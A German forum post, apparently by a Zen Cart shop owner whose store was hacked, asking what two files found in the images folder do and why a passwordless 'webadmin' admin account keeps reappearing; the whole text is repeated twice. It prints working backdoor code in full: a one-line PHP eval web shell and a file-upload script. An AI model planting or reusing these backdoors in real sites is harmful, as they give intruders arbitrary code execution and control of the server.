wir hatten ein Hackerangriff auf unseren shop. Es wurden 2 Dateien in images gefunden, die auch in zen_record_company eingetragen waren.
Datei 1: x00x.php enthält:
<?php eval(stripslashes($_REQUEST["_str"])); ?>
Datei 2; x2.php enthält:
?php
@ini_set("max_execution_time", 0);
@ini_set("memory_limit", "32");
@ini_set("post_max_size","32");
@ini_set("upload_max_filesize", "16");
@set_magic_quotes_runtime(0);
@error_reporting(0);
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
echo "<p>";
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "Upload failed";
}
echo "</p>";
echo "<pre>";
echo "Here is some more debugging info:";
print_r($_FILES);
if ($_FILES["userfile"]["error"] == 0){
echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>";
exit;
}
echo "</pre>";
} else if (isset($_GET["up"])) {
echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire " . (999 * 4);
exit;
}
?>
Was machen diese Dateien?
Wir haben sie gelöscht.
Im Admin Bereich ist ein Admin mit namen: webadmin, E-mail: localhost, ohne passwort vorhanden.
Darf dieser dort sein? Haben in gelöscht ist aber wieder vorhanden. Wir dieser ev. von shop selbst benötigt? Falls er nicht dahin gehört wir kommt er dahin und wie kann das gestoppt werden.
Datei 1: x00x.php enthält:
<?php eval(stripslashes($_REQUEST["_str"])); ?>
Datei 2; x2.php enthält:
?php
@ini_set("max_execution_time", 0);
@ini_set("memory_limit", "32");
@ini_set("post_max_size","32");
@ini_set("upload_max_filesize", "16");
@set_magic_quotes_runtime(0);
@error_reporting(0);
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
echo "<p>";
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "Upload failed";
}
echo "</p>";
echo "<pre>";
echo "Here is some more debugging info:";
print_r($_FILES);
if ($_FILES["userfile"]["error"] == 0){
echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>";
exit;
}
echo "</pre>";
} else if (isset($_GET["up"])) {
echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire " . (999 * 4);
exit;
}
?>
Was machen diese Dateien?
Wir haben sie gelöscht.
Im Admin Bereich ist ein Admin mit namen: webadmin, E-mail: localhost, ohne passwort vorhanden.
Darf dieser dort sein? Haben in gelöscht ist aber wieder vorhanden. Wir dieser ev. von shop selbst benötigt? Falls er nicht dahin gehört wir kommt er dahin und wie kann das gestoppt werden.
Kommentar